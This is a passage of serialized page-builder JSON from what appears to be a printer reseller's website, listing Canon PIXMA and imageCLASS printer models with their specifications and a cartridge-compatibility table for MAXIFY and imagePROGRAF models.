]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td 